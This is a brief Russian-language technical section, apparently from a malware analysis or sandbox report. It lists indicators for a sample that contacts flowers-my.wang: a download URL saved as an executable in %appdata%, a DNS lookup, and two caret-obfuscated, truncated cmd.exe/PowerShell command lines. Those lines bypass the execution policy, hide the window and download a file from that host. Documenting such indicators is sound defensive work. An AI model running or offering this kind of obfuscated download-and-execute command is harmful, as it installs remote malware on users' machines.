Техническая информация
- http://flowers-my.wang/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "p^owersHEl^L.^eXe -exE^c^u^tIO^n^PoLiCy b^ypas^S -^n^O^proF^Il^E^ -^W^I^NDowS^tyLE h^IDd^EN (^New^-object^ ^SYs^T^e^m.^n^eT.^WE^BcLiE^n^t)^.^doWN^LOAdfi^L^e^(^'http://flowers-my.wan...
- DNS ASK fl###rs-my.wang
- '<SYSTEM32>\cmd.exe' /c "p^owersHEl^L.^eXe -exE^c^u^tIO^n^PoLiCy b^ypas^S -^n^O^proF^Il^E^ -^W^I^NDowS^tyLE h^IDd^EN (^New^-object^ ^SYs^T^e^m.^n^eT.^WE^BcLiE^n^t)^.^doWN^LOAdfi^L^e^(^'http://flowers-my.wan...' (со скрытым окном)